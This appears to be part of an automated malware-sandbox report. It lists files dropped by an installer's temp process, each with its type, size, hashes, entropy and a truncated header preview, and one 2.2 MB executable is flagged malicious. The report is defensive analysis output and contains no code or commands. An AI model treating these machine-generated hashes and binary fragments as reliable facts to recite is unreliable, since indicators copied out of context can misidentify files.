                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):25614
                                                                                  Entropy (8bit):6.0293046975090325
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
                                                                                  MD5:B82364A204396C352F8CC9B2F8ABEF73
                                                                                  SHA1:20AD466787D65C987A9EBDBD4A2E8845E4D37B68
                                                                                  SHA-256:2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
                                                                                  SHA-512:C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#....."...`...............@.... g.................................a........ .........................@.......@...............................`............................c.......................................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......`.......@..............@.0@/4...........p.......F..............@.0@.bss..................................`..edata..@............T..............@.0@.idata..@............V..............@.0..CRT....,............\..............@.0..tls.................^..............@.0..reloc..`............`..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):15374
                                                                                  Entropy (8bit):5.25938266470983
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
                                                                                  MD5:228EE3AFDCC5F75244C0E25050A346CB
                                                                                  SHA1:822B7674D1B7B091C1478ADD2F88E0892542516F
                                                                                  SHA-256:7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
                                                                                  SHA-512:7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0....Xj.......................................... ......................p......................................................................P@......................................................text...$...........................`.P`.data...,....0......................@.0..rdata.......@....... ..............@.0@/4...........P......."..............@.0@.bss.........`........................`..edata.......p......................@.0@.idata...............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):15374
                                                                                  Entropy (8bit):5.25938266470983
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
                                                                                  MD5:228EE3AFDCC5F75244C0E25050A346CB
                                                                                  SHA1:822B7674D1B7B091C1478ADD2F88E0892542516F
                                                                                  SHA-256:7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
                                                                                  SHA-512:7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0....Xj.......................................... ......................p......................................................................P@......................................................text...$...........................`.P`.data...,....0......................@.0..rdata.......@....... ..............@.0@/4...........P......."..............@.0@.bss.........`........................`..edata.......p......................@.0@.idata...............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):25614
                                                                                  Entropy (8bit):6.0293046975090325
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
                                                                                  MD5:B82364A204396C352F8CC9B2F8ABEF73
                                                                                  SHA1:20AD466787D65C987A9EBDBD4A2E8845E4D37B68
                                                                                  SHA-256:2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
                                                                                  SHA-512:C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#....."...`...............@.... g.................................a........ .........................@.......@...............................`............................c.......................................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......`.......@..............@.0@/4...........p.......F..............@.0@.bss..................................`..edata..@............T..............@.0@.idata..@............V..............@.0..CRT....,............\..............@.0..tls.................^..............@.0..reloc..`............`..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):43520
                                                                                  Entropy (8bit):6.232860260916194
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
                                                                                  MD5:B162992412E08888456AE13BA8BD3D90
                                                                                  SHA1:095FA02EB14FD4BD6EA06F112FDAFE97522F9888
                                                                                  SHA-256:2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
                                                                                  SHA-512:078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):240654
                                                                                  Entropy (8bit):6.518503846592995
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
                                                                                  MD5:4F0C85351AEC4B00300451424DB4B5A4
                                                                                  SHA1:BB66D807EDE0D7D86438207EB850F50126924C9D
                                                                                  SHA-256:CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
                                                                                  SHA-512:80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...................`.....g.................................\........ .........................o.......\...............................t............................S.......................................................text...dF.......H..................`.P`.data...X....`.......L..............@.P..rdata.......p.......N..............@.`@/4.......<.......>...T..............@.0@.bss..................................`..edata..o...........................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..t...........................@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):852754
                                                                                  Entropy (8bit):6.503318968423685
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
                                                                                  MD5:07FB6D31F37FB1B4164BEF301306C288
                                                                                  SHA1:4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
                                                                                  SHA-256:06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
                                                                                  SHA-512:CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):315918
                                                                                  Entropy (8bit):6.5736483262229735
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:zvhrZEi7+khFXxn+m0GJjExfTKqyNwEozbpT80kqD6jD1TlT5Tjalc:zvz17FhtBnLot8XD1T3ac
                                                                                  MD5:201EA988661F3D1F9CA5D93DA83425E7
                                                                                  SHA1:D0294DF7BA1F6CB0290E1EFEBB5B627A11C8B1F5
                                                                                  SHA-256:4E4224B946A584B3D32BBABB8665B67D821BB8D15AB4C1CC4C39C71708298A39
                                                                                  SHA-512:6E6FA44CE2E07177DEC6E62D0BEE5B5D3E23A243D9373FB8C6EEECEC6C6150CBD457ED8B8C84AB29133DFE954550CA972DEC504069CC411BD1193A24EA98AAEE
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........R...................................................+....@... ......................0.......@.......p......................................................4S......................tA..$............................text...............................`..`.data...............................@....rdata...o.......p..................@..@/4......d`...`...b...D..............@..@.bss.....P...............................edata.......0......................@..@.idata.......@......................@....CRT....,....P......................@....tls.........`......................@....rsrc........p......................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):112640
                                                                                  Entropy (8bit):6.540227486061059
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                                  MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                                  SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                                  SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                                  SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                                  Malicious:false
                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):772608
                                                                                  Entropy (8bit):6.546391052615969
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
                                                                                  MD5:B3B487FC3832B607A853211E8AC42CAD
                                                                                  SHA1:06E32C28103D33DAD53BE06C894203F8808D38C1
                                                                                  SHA-256:30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
                                                                                  SHA-512:FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
                                                                                  Malicious:false
                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):294926
                                                                                  Entropy (8bit):6.191604766067493
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                                  MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                                  SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                                  SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                                  SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):13838
                                                                                  Entropy (8bit):5.173769974589746
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
                                                                                  MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
                                                                                  SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
                                                                                  SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
                                                                                  SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):258560
                                                                                  Entropy (8bit):6.491223412910377
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
                                                                                  MD5:DB191B89F4D015B1B9AEE99AC78A7E65
                                                                                  SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
                                                                                  SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
                                                                                  SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:modified
                                                                                  Size (bytes):2207670
                                                                                  Entropy (8bit):6.40492801249664
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:WgUuC+Q/Wk0q61pnaabTniY7A5YVoZgMOuBKWqk05myavB1W1oxYxixrJu+cTjX7:WgYx+dzPawTf7Fv+KlzP+VuUkD
                                                                                  MD5:3362BAC458070E33D0CABCDA1E4B735C
                                                                                  SHA1:76AC1F5B96667D9621EEDD92AB0704B9C7A129B0
                                                                                  SHA-256:4DBFD9DF16A57D8FF7A00A378FE737EFC179F53F2CE975DAEAEDBAA6AB8BCECD
                                                                                  SHA-512:59ED8A9D16E100AD91D98AD3A08EABE148234633E59BFB4BEF1B63E5A54C3E63193F088AD1538C4898A7A6AC5EAD65A2E244AE64BC5325BBF87E763474C5A5CE
                                                                                  Malicious:true
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L....ue.................`...................p....@...........................!......."......................................y..P........G...........................................................................p...............................text....[.......`.................. ..`.rdata.......p... ...p..............@..@.data....P.......0..................@....rsrc....G.......P..................@..@.hsave.......@......................`...................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2207670
                                                                                  Entropy (8bit):6.404927634828125
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:RgUuC+Q/Wk0q61pnaabTniY7A5YVoZgMOuBKWqk05myavB1W1oxYxixrJu+cTjX7:RgYx+dzPawTf7Fv+KlzP+VuUkD
                                                                                  MD5:84F957AF586E13BF92DCD452B58496FA
                                                                                  SHA1:95B1A7A0BBA84445E702A56B3DD01EC397F5527F
                                                                                  SHA-256:2E6BBB5A6808C368A8BCCD6FF0032931873BFC870EBD3F97715777C918391667
                                                                                  SHA-512:6603F265DFA10D2124BA700946F386B1C97645E4C70C6A5A0406746E943DFB59356DDC8D4820512C1CCFB8D62222B55787DC8CF497620337B7FD63CB117D7B35
                                                                                  Malicious:false
                                                                                  Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L....ue.................`...................p....@...........................!......."......................................y..P........G...........................................................................p...............................text....[.......`.................. ..`.rdata.......p... ...p..............@..@.data....P.......0..................@....rsrc....G.......P..................@..@.hsave.......@......................`...................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:IFF data
                                                                                  Category:dropped
                                                                                  Size (bytes):1716
                                                                                  Entropy (8bit):4.781797138644031
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                                  MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                                  SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                                  SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                                  SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                                  Malicious:false
                                                                                  Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1825
                                                                                  Entropy (8bit):5.088030483893024
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                  MD5:992C00BEAB194CE392117BB419F53051
                                                                                  SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                  SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                  SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                  Malicious:false
                                                                                  Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:IFF data
                                                                                  Category:dropped
                                                                                  Size (bytes):1716
                                                                                  Entropy (8bit):4.781797138644031
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                                  MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                                  SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                                  SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                                  SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                                  Malicious:false
                                                                                  Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1825
                                                                                  Entropy (8bit):5.088030483893024
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                  MD5:992C00BEAB194CE392117BB419F53051
                                                                                  SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                  SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                  SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                  Malicious:false
                                                                                  Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:IFF data
                                                                                  Category:dropped
                                                                                  Size (bytes):1716
                                                                                  Entropy (8bit):4.781797138644031
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                                  MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                                  SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                                  SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
